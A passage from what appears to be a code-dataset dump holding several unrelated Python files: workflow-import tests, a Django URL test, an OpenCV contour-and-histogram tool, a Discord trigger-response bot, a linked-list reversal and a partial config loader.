29)),\n (\"task assignees\", \"testuser@example.com\"),\n ]),\n ]\n response += self.import_data(*tgt_data_block)\n\n self._check_csv_response(response, {})\n self.assertEqual(1, Workflow.query.count())\n self.assertEqual(1, TaskGroup.query.count())\n self.assertEqual(3, TaskGroupTask.query.count())\n\n task_group = TaskGroup.query.filter_by(title=\"tg-1\").first()\n mapped_objs = [rel_obj for rel_obj in task_group.related_objects()\n if rel_obj.type == 'Objective']\n self.assertEqual(1, len(mapped_objs))\n\n task2 = TaskGroupTask.query.filter_by(title=\"task-2\").first()\n task3 = TaskGroupTask.query.filter_by(title=\"task-3\").first()\n self.assertEqual(task2.start_date, date(2015, 7, 10))\n self.assertEqual(task2.end_date, date(2016, 12, 30))\n self.assertIn(\"ch2\", task3.response_options)\n\n def test_invalid_import(self):\n \"\"\"Test import of a workflow with missing data\"\"\"\n bad_workflow = [\n collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", \"bad_workflow-1\"),\n (\"admin\", \"\"),\n (\"Need Verification\", 'True'),\n ]),\n ]\n\n response = self.import_data(*bad_workflow)\n\n expected_errors = {\n \"Workflow\": {\n \"row_warnings\": {\n errors.OWNER_MISSING.format(line=3, column_name=\"Admin\")\n },\n }\n }\n self._check_csv_response(response, expected_errors)\n\n @ddt.data(\n (\"Rich Text\", \"Rich text example\", {}),\n (\"Checkboxes\", \"ch1, ch2, some checkbox 3\", {}),\n (\"aaaa\", \"Wrong task type\", {\n \"Task Group Task\": {\n \"row_warnings\": {\n errors.WRONG_REQUIRED_VALUE.format(\n line=3, value=\"aaaa\", column_name=\"Task Type\"\n ),\n }\n }\n }),\n (\"\", \"Empty task type\", {\n \"Task Group Task\": {\n \"row_warnings\": {\n errors.MISSING_VALUE_WARNING.format(\n line=3, default_value=\"Rich Text\",\n column_name=\"Task Type\"),\n }\n }\n })\n )\n @ddt.unpack\n def test_import_task_types(self, task_type, task_description,\n expected_errors):\n \"\"\"Test task import with warnings\n\n Check that the warnings for bad task type field work and that the task type\n gets set to default when an invalid values is found in the csv.\n\n Raises:\n AssertionError: When file import does not return correct errors for the\n example csv, or if any of the tasks does not have the expected task\n type.\n\n \"\"\"\n task_group = wf_factories.TaskGroupFactory(title=\"tg-1\")\n tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-1\"),\n (\"task type\", task_type),\n (\"task description\", task_description),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 1)),\n (\"task due date\", date(2015, 7, 15)),\n (\"task assignees\", \"user@example.com\"),\n ]),\n ]\n\n response = self.import_data(*tgt_data_block)\n\n self._check_csv_response(response, expected_errors)\n\n task_type_aliases = {\n \"Rich Text\": \"text\",\n \"Checkboxes\": \"checkbox\"\n }\n\n if task_type not in task_type_aliases:\n task_type = \"Rich Text\"\n\n task_slug = db.session.query(TaskGroupTask.slug).filter(\n TaskGroupTask.task_type == task_type_aliases[task_type]).one()\n self.assert_task_types(task_type_aliases[task_type], task_slug)\n\n @ddt.data(\n (date(2099, 7, 1), date(2015, 7, 15), {\n \"Task Group Task\": {\n \"row_errors\": {\n errors.INVALID_START_END_DATES.format(\n line=3, start_date=\"Task Start Date\",\n end_date=\"Task Due Date\"),\n }\n }\n }),\n (date(2016, 12, 25), date(2017, 1, 12), {\n \"Task Group Task\": {\n \"row_errors\": {\n errors.START_DATE_ON_WEEKEND_ERROR.format(line=3),\n }\n }\n }),\n (date(2015, 7, 1), date(2016, 12, 25), {\n \"Task Group Task\": {\n \"row_errors\": {\n errors.END_DATE_ON_WEEKEND_ERROR.format(line=3),\n }\n }\n }),\n )\n @ddt.unpack\n def test_bad_task_dates(self, start_date, end_date, expected_errors):\n \"\"\"Test import updates with invalid task dates.\n\n This import checks if it's possible to update task dates\n 1. with start date being bigger than the end date.\n 2. Start date being a weekend\n 3. Due date being a weekend\n \"\"\"\n task_group = wf_factories.TaskGroupFactory(title=\"tg-1\")\n\n tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-1\"),\n (\"task type\", \"Rich Text\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 1)),\n (\"task due date\", date(2015, 7, 15)),\n (\"task assignees\", \"user@example.com\"),\n ]),\n ]\n\n self.import_data(*tgt_data_block)\n\n task1 = TaskGroupTask.query.filter_by(title=\"task-1\").first()\n\n bad_tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", task1.slug),\n (\"task start date\", start_date),\n (\"task due date\", end_date),\n ]),\n ]\n\n response = self.import_data(*bad_tgt_data_block)\n\n self._check_csv_response(response, expected_errors)\n\n def assert_task_types(self, expected_type, task_slugs):\n \"\"\"Test that all listed tasks have expected text type.\n\n This is a part of the test_import_task_date_format\n\n Args:\n expected_type: Expected task type for all tasks specified by task_slugs.\n task_slugs: list of slugs for the tasks that will be tested.\n\n Raises:\n AssertionError: if any of the tasks does not exists or if their type is\n not text.\n \"\"\"\n tasks = db.session.query(TaskGroupTask).filter(\n TaskGroupTask.slug.in_(task_slugs)).all()\n\n for task in tasks:\n self.assertEqual(\n task.task_type,\n expected_type,\n \"task '{}' has type '{}', expected '{}'\".format(\n task.slug,\n task.task_type,\n expected_type,\n )\n )\n self.assertEqual(len(tasks), len(task_slugs))\n\n @ddt.data(\n (True, 'True'),\n (True, 'true'),\n (True, 'TRUE'),\n (False, 'False'),\n (False, 'false'),\n (False, 'FALSE'),\n (True, 'yes'),\n (True, 'YES'),\n (True, 'Yes '),\n (True, 'yEs'),\n (False, ' no '),\n (False, 'No '),\n (False, 'nO'),\n (False, 'NO'),\n )\n @ddt.unpack\n def test_import_verification_flag(self, flag, import_value):\n \"\"\"Create wf with need verification flag.\"\"\"\n title = \"SomeTitle\"\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", title),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['created'])\n workflow = Workflow.query.filter(Workflow.title == title).first()\n self.assertEqual(flag, workflow.is_verification_needed)\n\n @ddt.data(\n ('FALSE', False),\n ('False', False),\n ('false', False),\n ('TRUE', True),\n ('True', True),\n ('true', True),\n ('yes', True),\n ('YES', True),\n ('Yes ', True),\n ('yEs', True),\n (' no ', False),\n ('No ', False),\n ('nO', False),\n ('NO', False),\n )\n @ddt.unpack # pylint: disable=invalid-name\n def test_update_verification_true_flag_positive(self, import_value,\n expected_value):\n \"\"\"Test update of verification flag before activation\n when is_verification_needed is TRUE\n \"\"\"\n slug = 'SomeCode'\n with freezegun.freeze_time(\"2017-08-10\"):\n with factories.single_commit():\n workflow = wf_factories.WorkflowFactory(\n slug=slug, is_verification_needed=True)\n wf_factories.TaskGroupTaskFactory(\n task_group=wf_factories.TaskGroupFactory(\n workflow=workflow,\n context=factories.ContextFactory()\n ),\n start_date=date(2017, 8, 3),\n end_date=date(2017, 8, 7))\n wf_id = workflow.id\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['updated'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, expected_value)\n\n @ddt.data(\n ('FALSE', False),\n ('False', False),\n ('false', False),\n ('TRUE', True),\n ('True', True),\n ('true', True),\n ('yes', True),\n ('YES', True),\n ('Yes ', True),\n ('yEs', True),\n (' no ', False),\n ('No ', False),\n ('nO', False),\n ('NO', False),\n )\n @ddt.unpack # pylint: disable=invalid-name\n def test_update_verification_false_flag_positive(self, import_value,\n expected_value):\n \"\"\"Test update of verification flag before activation\n when is_verification_needed is FALSE\n \"\"\"\n slug = 'SomeCode'\n with freezegun.freeze_time(\"2017-08-10\"):\n with factories.single_commit():\n workflow = wf_factories.WorkflowFactory(\n slug=slug, is_verification_needed=False)\n wf_factories.TaskGroupTaskFactory(\n task_group=wf_factories.TaskGroupFactory(\n workflow=workflow,\n context=factories.ContextFactory()\n ),\n start_date=date(2017, 8, 3),\n end_date=date(2017, 8, 7))\n wf_id = workflow.id\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['updated'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, expected_value)\n\n @ddt.data(\n (True, 'FALSE'),\n (True, 'False'),\n (True, 'false'),\n (False, 'TRUE'),\n (False, 'True'),\n (False, 'true'),\n (False, 'yes'),\n (False, 'YES'),\n (False, 'Yes '),\n (False, 'yEs'),\n (True, ' no '),\n (True, 'No '),\n (True, 'nO'),\n (True, 'NO'),\n )\n @ddt.unpack # pylint: disable=invalid-name\n def test_update_verification_flag_negative(self, db_value, import_value):\n \"\"\"Test update of verification flag after activation\"\"\"\n slug = 'SomeCode'\n with freezegun.freeze_time(\"2017-08-10\"):\n with factories.single_commit():\n workflow = wf_factories.WorkflowFactory(\n slug=slug,\n is_verification_needed=db_value,\n repeat_every=1,\n unit=Workflow.WEEK_UNIT)\n wf_factories.TaskGroupTaskFactory(\n task_group=wf_factories.TaskGroupFactory(\n workflow=workflow,\n context=factories.ContextFactory()\n ),\n # Two cycles should be created\n start_date=date(2017, 8, 3),\n end_date=date(2017, 8, 7))\n\n wf_id = workflow.id\n self.generator.activate_workflow(workflow)\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.status, workflow.ACTIVE)\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['ignored'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, db_value)\n\n # End all current cycles\n for cycle in workflow.cycles:\n self.generator.modify_object(cycle, {'is_current': False})\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.status, workflow.INACTIVE)\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['ignored'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, db_value)\n\n def test_error_verification_flag(self):\n \"\"\"Test create wf without Needed Verification flag\"\"\"\n title = \"SomeTitle\"\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", title),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['ignored'])\n self.assertIsNone(Workflow.query.filter(Workflow.title == title).first())\n\n @ddt.data((\"\", errors.MISSING_VALUE_ERROR), (\"--\", errors.WRONG_VALUE_ERROR))\n @ddt.unpack\n def test_create_required_flag_error(self, data, msg):\n \"\"\"Test create wf with empty or invalid Needed Verification flag\"\"\"\n title = \"SomeTitle\"\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", title),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n (\"Need Verification\", data),\n ]))\n data = {\n \"Workflow\": {\n \"row_errors\": {\n msg.format(line=3, column_name=\"Need Verification\")\n }\n }\n }\n self.assertEqual(1, resp[0]['ignored'])\n self._check_csv_response(resp, data)\n self.assertIsNone(Workflow.query.filter(Workflow.title == title).first())\n","sub_path":"test/integration/ggrc_workflows/converters/test_import_workflow_objects.py","file_name":"test_import_workflow_objects.py","file_ext":"py","file_size_in_byte":18554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505645060","text":"from django.test import TestCase\nfrom django.test.client import Client\n\n\nclass TestURLS(TestCase):\n \"\"\"Test various urls.\"\"\"\n\n def setUp(self):\n \"\"\"Setup data.\"\"\"\n\n def tearDown(self):\n \"\"\"Clean up data.\"\"\"\n\n def test_urls(self):\n urls = [\n # url, expected http code\n ('/', 200),\n ('/login/', 302), # should redirect to CAS\n ('/login', 301), # should permanent redirect to /login/ (with /)\n ('/status/ping', 200),\n ('/status/ping/', 200),\n ('/status/health/', 200),\n ]\n client = Client()\n\n for url, code in urls:\n with self.subTest(url=url):\n response = client.get(url)\n location = getattr(response, 'url', '')\n msg = f'{url} -> {location} -> {response.content}'\n self.assertEquals(response.status_code, code, msg)\n","sub_path":"core/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624979809","text":"import cv2\nimport numpy as np\nimport sys\nfrom matplotlib import pyplot as plt\nimport argparse\n\nimport pdb\n\n\ndrawing = False # true if mouse is pressed\n#ix = -1 #Creamos un punto inicial x,y\n#iy = -1,\ndotslist = [] #Creamos una lista donde almacenaremos los puntos del contorno\n\nglobal thick_contour\nthick_contour = 10\n\n# mouse callback function\ndef draw_dots(event1,x,y,flags,param): #Crea los puntos de contorno\n \n global ix,iy,drawing, dotslist#Hacemos globales la variabbles dentro de la funcion\n\n if event1 == cv2.EVENT_LBUTTONDOWN:#creamos la accion que se realizara si damos click\n drawing = True #Drawinf se vuelve True\n ix = x #Tomamos el punto donde se dio click\n iy = y\n dot = [x,y]\n dotslist.append(dot)#Lo agregamos al dotslist\n\n elif event1 == cv2.EVENT_MOUSEMOVE:#Creamos la accion si el mouse se mueve\n if drawing == True: #drawing se vuelve true\n #cv2.circle(img,(x,y),1,(0,0,255),2)\n cv2.line(img, (x,y), (x,y), (0,255,0), thick_contour)#Dibujamos una linea de un solo pixel\n x = x\n y = y\n dot = [x,y]\n dotslist.append(dot)#Agregamos el punto a dotslist\n #print(dotslist) #Imprimimos el dotslist\n\n elif event1 == cv2.EVENT_LBUTTONUP:#Cremaos el evento si el boton se levanta\n drawing = False\n #cv2.circle(img,(x,y),1,(0,0,255),1)\n cv2.line(img, (x,y), (x,y), (0,255,0), thick_contour)#Dibujamos la ultima lina en el ultimo punto\n \n return dotslist#Retornamos el dotlist\n\n\ndef Croped(dotslist, img):#hacemos un corte de la imagen en linea recta de tal forma que tenga las \n #dimenciones maximas del poligono que creamos\n rect = cv2.boundingRect(dotslist)#Encontramos los limites maximos del\n (x,y,w,h) = rect#Tomamos las dimenciones maximas del dotlist y las guardamos para dimencionar la mascara\n croped = img[y:y+h, x:x+w].copy()#cortamos una seccion rectangular de la imagen\n dotslist2 = dotslist- dotslist.min(axis=0)#reajustamos el dotslist con el minimo \n\n mask = np.zeros(croped.shape[:2], dtype = np.uint8)# creamos una mascara de ceros para poder hacer el corte irregular\n cv2.drawContours(mask, [dotslist2], -1, (255,255, 255), -1, cv2.LINE_AA)#dibujamos el contorno\n dts = cv2.bitwise_and(croped,croped, mask=mask)#hacemos ceros todos los pixeles externos al contorno, aplicamos la mascara a la imagen\n \n return [dts, mask, croped, dotslist2]\n\ndef save_img_with_contour(dotslist, img):\n mask = np.zeros(img.shape[:2], dtype = np.uint8)# creamos una mascara de ceros para poder hacer el corte irregular\n dotslist2 = dotslist- dotslist.min(axis=0)#reajustamos el dotslist con el minim\n cv2.drawContours(mask, [dotslist2], -1, (255,255, 255), -1, cv2.LINE_AA)#dibujamos el contorno\n \n return mask\n\ndef histogram(img, mask):\n \n hist = cv2.calcHist([img], [0], mask, [256], [0,256])\n return hist\n\ndef Listing(y):\n \n y1 = []#Creamos una lista vacia\n for i in range(len(y)):#llenamos la lista vacia con los datos de y, esto porque y es de la forma y = [[],[],[]], y necesitamos y = []\n y1.append(y[i][0]) \n \n return y1\n\ndef max_values(hist):\n \n hist = np.asarray(hist)\n max_count = max(hist)\n max_intensity = hist.argmax()\n return [max_count, max_intensity] \n\ndef img_in_memory(file):\n \n img = cv2.imread(file)#Lee la imagen a color\n return img\n\ndef File_Writer(file_name, data1):\n \n file = open(str(file_name) + '_Counts_vs_intensity.csv','a')\n \n file.write('# ' + str(file_name) + '_Counts_vs_intensity'+ '\\n')\n file.write('# counts max value: ' + str(data1[1]) + '\\n')\n file.write('# intensity max value: ' + str(data1[2]) + '\\n')\n file.write('# intensity counts \\n')\n \n for h in range(len(data1[0])):\n file.write(str(h) + '\t'+ str(data1[0][h]) +'\\n')\n file.close()\n \n\nap = argparse.ArgumentParser()\nap.add_argument('-i', '--image', help = 'path to the image')\nargs = vars(ap.parse_args())\n#llamamos asi #python Color_Detector_1.py --image 1.jpg\n\nfile = args['image']\n#file = str(sys.argv[1])\n\n#Rfactor= 0.20\n\nimg = cv2.imread(file)#Lee la imagen a color\nimg2 = cv2.imread(file,cv2.IMREAD_GRAYSCALE)#Lee la imagen pero en intensidad (B and W)\nimg3 = cv2.imread(file)\ncv2.namedWindow(file, cv2.WINDOW_NORMAL)#Cremaos la ventana para mistras a img\ncv2.setMouseCallback(file,draw_dots) #llamamos al MouseCall para dibujar el contorno\n\n\nname1 = file[0:-4]#definimos un mobre sin la extrension del archivo\n\n#Espacio_de_graficacion_1_de_histograma\nfig1 = plt.figure()\nax1 = fig1.add_subplot(111)\nplt.ion()\n\n#ax1.set_xlim(0,256)\nax1.set_xticks(np.linspace(0, 256, 10))#ajusta las etiquetas en x\nax1.set_xlabel('Intensity Values', fontsize= 12)\nax1.set_ylabel('Counts', fontsize= 12)\nax1.set_title('Histogram of: ' + name1)\n\n#Espacio_de_graficacion_2_de_histograma e imagen\nfig2 = plt.figure()\nplt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.5, hspace=0.5)\nax2 = fig2.add_subplot(121)\n\nplt.ion()\nax2.set_xticks(np.linspace(0, 256, 10))#ajusta las etiquetas en x\nax2.set_xlabel('Intensity Values', fontsize= 12)\nax2.set_ylabel('Counts', fontsize= 12)\nax2.set_title('Image: ' + name1)\n\nax3 = fig2.add_subplot(122)\n\nax3.set_xlabel('x pixel position', fontsize= 12)\nax3.set_ylabel('y pixel position', fontsize= 12)\nax3.set_title('Histogram of: ' + name1)\n\nplt.ion()\n\nplt.show(block=False)\n\ni = 1\nwhile(1):\n cv2.imshow(file,img) #Mostramos a img en la ventana para dibujar el contono\n\n k = cv2.waitKey(10) & 0xFF\n #l = cv2.waitKey(1) & 0xFF\n \n \n if k == ord('a'): #space \n print('Corte_aplicado') \n dotslist = np.asarray(dotslist)#Convertimos el contorno en un array de numpy\n #Aplicamos el contorno a la image a partir de dtolist\n img_croped_BB = Croped(dotslist, img2)[0]#Rcuperamos solo la region de interes (imagen cortada con bordes negros=Black Borders)\n mask = Croped(dotslist, img2)[1] #Recuperamos la mascara creada\n img_croped = Croped(dotslist, img2)[2]#recuperamos la imagen cortada en rectangulo para analizar con la mascara \n \n dotslist = dotslist.tolist()\n #Sacamos el histograma\n hist = histogram(img_croped, mask)#Calculamos el histograma usando la mascara #len(hist) = 256\n hist = Listing(hist)\n [max_count, max_intensity] = max_values(hist)\n print('max count: ' + str(max_count) + '\\n' + 'max intensity: ' + str(max_intensity))\n\n \n if k == ord('s'):\n print('Datos guardados')\n #Analisis\n #x = np.linspace(0.0, len(hist), len(hist)) #creamos los x para hace el fit, (inicio, final, numero total)\n #pdb.set_trace()\n\n #Histograma\n #ax1.set_xticks(np.arange(0, len(x), step=20))\n line1, = ax1.plot(np.linspace(0, max(hist), 256, endpoint=False))\n line1.set_ydata(hist)\n ax1.set_xlabel('Intensity Values', fontsize= 12)\n ax1.set_ylabel('Counts', fontsize= 12)\n fig1.canvas.draw()#updatea el grafico con la nueva curva\n ax1.draw_artist(ax1.patch)#selecciona al arreglo de ax, para darle rango al eje x\n ax1.draw_artist(line1) #Redibuja line solo si es necesario\n ax1.text(120, 120, 'max count: ' + str(max_count) + '\\n' + 'max intensity: ' + str(max_intensity), fontsize=12)\n ax1.legend(loc='best')\n \n fig1.canvas.flush_events()#Hace un sleep para que se pueda crear la grafica\n fig1.savefig('Histogram of ' + name1 +'_' +str(i) + '.svg') \n \n #Imagen e histograma\n ax3.set_xlabel('x pixel position', fontsize= 12)\n ax3.set_ylabel('y pixel position', fontsize= 12)\n ax3.imshow(img_croped_BB, cmap= 'Greys')\n \n \n line2, = ax2.plot(np.linspace(0, max(hist), 256, endpoint=False))\n line2.set_ydata(hist)\n fig2.canvas.draw()#updatea el grafico con la nueva curva\n ax2.set_xlabel('Intensity Values', fontsize= 12)\n ax2.set_ylabel('Counts', fontsize= 12)\n ax2.draw_artist(ax2.patch)#selecciona al arreglo de ax, para darle rango al eje x\n ax2.draw_artist(line2) #Redibuja line solo si es necesario\n \n fig2.canvas.flush_events()#Hace un sleep para que se pueda crear la grafica\n fig2.savefig('Image_and_histogram_of_' + name1 + '_' +str(i) + '.svg')\n \n #plt.show()\n cv2.imshow('croped', img_croped_BB)#Mostramos img2 con el contorno \n cv2.imwrite(\"Corte_\" + name1 + '_' + str(i) +'_.jpg', img_croped_BB) \n \n File_Writer('Data_Analisis_Image:_'+ name1 + '_' + str(i), [hist, max_count, max_intensity])\n \n selected_area = cv2.drawContours(img, [np.asarray(dotslist)], -1, (0,255,0), thick_contour)#Dibujamos el contorno\n cv2.imwrite(\"Area_seleccionada_numero_\" + str(i) + \"de:\" + name1 +'_.jpeg', selected_area)\n \n i += 1#Para poder guardar en la siguiente ejecucion sin sobreescribir la anterior\n\n if k == ord('d'):\n print('Contorno y datos borrados')\n hist.clear()\n dotslist.clear()\n ax1.clear()\n ax2.clear()\n #cv2.destroyAllWindows()#Destruimos todas las ventanas\n cv2.namedWindow(file, cv2.WINDOW_NORMAL)\n img = img_in_memory(file)\n\n \n if k == ord('q'):#esc\n #pdb.set_trace()\n break# hace,el break para para el programa si se estripa esc\n\ncv2.destroyAllWindows()#Destruimos todas las ventanas\n","sub_path":"other_programs/MainContour_v6.py","file_name":"MainContour_v6.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142467571","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import has_role\nfrom discord.utils import get\nimport os\nimport string\nimport re\nimport json\nfrom dotenv import load_dotenv\n\nbot = commands.Bot(command_prefix=\"~s \")\n\n\ndef writeJSON(trigger, response):\n newDict = ({trigger: response.content})\n with open('responses.json', encoding='utf8') as file:\n oldDict = json.load(file)\n\n final = dict(oldDict, **newDict)\n\n with open('responses.json', \"w\", encoding='utf8') as file:\n json.dump(final, file, indent=2)\n\n\ndef delJson(user, trigger):\n with open('responses.json', encoding='utf8') as file:\n dictionary = json.load(file)\n\n deletedEntry = dictionary.pop(trigger)\n delLog(user, deletedEntry)\n\n with open('responses.json', \"w\", encoding='utf8') as file:\n json.dump(dictionary, file, indent=2)\n\n\ndef writeLog(author, message, response):\n log = open(\"log.txt\", \"a\", encoding='utf8')\n entry = (\"User \" + str(author) + \" entered the trigger '\" + message + \"' with the response '\" + response + \"'\\n\")\n log.write(entry)\n print(entry)\n log.close()\n\n\ndef delLog(author, message):\n log = open(\"log.txt\", \"a\", encoding='utf8')\n entry = (\"User \" + str(author) + \" deleted the entry '\" + message + \"'\\n\")\n log.write(entry)\n print(entry)\n log.close()\n\n\ndef check(author):\n def check2(message):\n if message.author != author:\n return False\n return True\n\n return check2\n\n\n@bot.command(brief=\"Makes the bot user role.\",\n description=\"Makes the bot user role. You are free to change the color and permissions, \"\n \"but do not change the name.\")\nasync def setup(ctx):\n await ctx.message.delete()\n if get(ctx.guild.roles, name=\"Simply User\"):\n await ctx.author.send(\"Role is already setup.\")\n else:\n await ctx.guild.create_role(name=\"Simply User\", colour=discord.Colour.from_rgb(105, 135, 209))\n await ctx.author.send(\"Role created! 🎉\")\n\n\n@bot.command(brief=\"Adds new triggers and responses.\",\n description=\"Adds new triggers and responses. Note that it ignores punctuation only in the triggers.\")\n@has_role(\"Simply User\")\nasync def new(ctx):\n await ctx.message.delete()\n await ctx.author.send(\"What would you like the trigger message to be? `cancel` to cancel.\")\n unconditionedTrigger = await bot.wait_for('message', check=check(ctx.author))\n message = unconditionedTrigger.content\n\n if message == \"cancel\":\n await ctx.author.send(\"Cancelling.\")\n return\n\n for punc in string.punctuation:\n message = message.replace(punc, \"\")\n\n await ctx.author.send(\"Duly noted. What would you like the response to be? \")\n response = await bot.wait_for('message', check=check(ctx.author))\n await ctx.author.send(\"All done. 😀\")\n writeLog(unconditionedTrigger.author, message, response.content)\n writeJSON(message, response)\n\n\n@new.error\nasync def new_error(ctx, error):\n if isinstance(error, commands.MissingRole):\n await ctx.author.send(\"You do not have permissions to add an entry!\")\n if isinstance(error, commands.NoPrivateMessage):\n await ctx.author.send(\"You cannot run this command in PMs!\")\n\n\n@bot.command(brief=\"Deletes a selected trigger/response pair.\",\n description=\"Deletes a selected trigger/response pair. Note that it ignores punctuation in the target \"\n \"trigger.\")\nasync def delete(ctx):\n await ctx.message.delete()\n await ctx.author.send(\"What trigger would you like to delete? 🗑 (`cancel` to cancel.)\")\n unconTargetTrig = await bot.wait_for('message', check=check(ctx.author))\n targetTrig = unconTargetTrig.content\n\n if targetTrig == \"cancel\":\n await ctx.author.send(\"Cancelling.\")\n return\n\n for punc in string.punctuation:\n targetTrig = targetTrig.replace(punc, \"\")\n found = False\n with open('responses.json') as file:\n searchDict = json.load(file)\n for key in searchDict:\n if key.lower() == targetTrig.lower():\n await ctx.author.send(\"Sure thing.\")\n found = True\n delJson(ctx.author, key)\n if not found:\n await ctx.author.send(\"I can't find the entry you're looking for 🤔. Try again, or ask the host for help.\")\n\n\n@delete.error\nasync def delete_error(ctx, error):\n if isinstance(error, commands.MissingRole):\n await ctx.author.send(\"You do not have permissions to delete an entry!\")\n if isinstance(error, commands.NoPrivateMessage):\n await ctx.author.send(\"You cannot run this command in PMs!\")\n\n\n@bot.event\nasync def on_message(message):\n if message.author != bot.user and not isinstance(message.channel, discord.channel.DMChannel) and not message.author.bot:\n with open('responses.json') as file:\n searchDict = json.load(file)\n for key in searchDict:\n if re.search(r\"\\b\" + re.escape(key) + r\"(\\b|$)\", message.content,\n re.MULTILINE | re.IGNORECASE):\n await message.channel.send(searchDict[key])\n await bot.process_commands(message)\n\n\n@bot.event\nasync def on_ready():\n print(\"Bot Operational!\")\n\n\nload_dotenv()\ntoken = os.getenv('token')\nbot.run(token)\n\n# .,-:;//;:=,\n# . :H@@@MM@M#H/.,+%;,\n# ,/X+ +M@@M@MM%=,-%HMMM@X/,\n# -+@MM; $M@@MH+-,;XMMMM@MMMM@+-\n# ;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.\n# ,%MM@@MH ,@%= .---=-=:=,.\n# -@#@@@MX ., -%HX$$%%%+;\n# =-./@M@M$ .;@MMMM@MM:\n# X@/ -$MM/ .+MM@@@M$\n#,@M@H: :@: . -X#@@@@-\n#,@@@MMX, . /H- ;@M@M=\n#.H@@@@M@+, %MM+..%#$.\n# /MMMM@MMH/. XM@MH; -;\n# /%+%$XHH@$= , .H@@@@MX,\n# .=--------. -%H.,@@@@@MX,\n# .%MM@@@HHHXX$$$%+- .:$MMX -M@@MM%.\n# =XMMM@MM@MM#H;,-+HMM@M+ /MMMX=\n# =%@M@M#@$-.=$@MM@@@M; %M%=\n# ,:+$+-,/H#MMMMMMM@- -,\n# =++%%%%+/:-.\n#","sub_path":"simply-bot.py","file_name":"simply-bot.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226112239","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @param {integer} m\n # @param {integer} n\n # @return {ListNode}\n def reverseBetween(self, head, m, n):\n if m == n: return head\n index = 0\n dummy = ListNode(0)\n dummy.next = head\n begin= dummy\n for i in range(m-1):\n begin = begin.next # begin.next is the start\n p = begin.next\n for j in range(n-m):\n temp = begin.next\n begin.next = p.next\n p.next = p.next.next\n begin.next.next = temp\n return dummy.next\n","sub_path":"reverseLinkedList/reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120444801","text":"from json import load\nfrom json.decoder import JSONDecodeError\n\n\nclass Config:\n max_users = -1\n max_posts = -1\n max_likes = -1\n\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, '_instance'):\n cls._instance = super().__new__(cls, *args, **kwargs)\n return cls._instance\n\n def from_json(self, path: str):\n with open(path, 'r') as f:\n try:\n cfg = load(f)\n self._validate_cfg(cfg)\n self._init_from_cfg(cfg)\n except JSONDecodeError as e:\n raise e\n except ConfigValidationError as e:\n raise e\n \n def _validate_cfg(self, cfg: dict):\n self._validate_cfg_value('max_users', cfg.get('max_users'))\n self._validate_cfg_value('max_posts', cfg.get('max_posts'))\n self._validate_cfg_value('max_likes', 